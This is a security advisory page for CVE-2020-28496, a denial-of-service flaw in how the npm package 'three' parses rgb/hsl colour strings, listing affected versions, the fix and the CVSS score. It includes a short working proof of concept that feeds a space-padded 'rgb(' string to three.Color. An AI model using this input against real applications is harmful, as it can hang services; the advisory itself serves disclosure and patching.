Skip to content

Denial of service in three

High severity GitHub Reviewed Published Mar 1, 2021 to the GitHub Advisory Database • Updated Sep 11, 2023

Package

npm three (npm)

Affected versions

< 0.125.0

Patched versions

0.125.0

Description

This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors.

PoC:

var three = require('three')
function build_blank(n) {
    var ret = "rgb("
    for (var i = 0; i < n; i++) {
        ret += " "
    }
    return ret + "";
}
var Color = three.Color
var time = Date.now();
new Color(build_blank(50000)) var time_cost = Date.now() - time;
console.log(time_cost + " ms")

References

Published by the National Vulnerability Database Feb 18, 2021
Reviewed Feb 24, 2021
Published to the GitHub Advisory Database Mar 1, 2021
Last updated Sep 11, 2023

Severity

High
7.5
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Weaknesses

CVE ID

CVE-2020-28496

GHSA ID

GHSA-fq6p-x6j3-cmmq

Source code

No known source code
Checking history
See something to contribute? Suggest improvements for this vulnerability.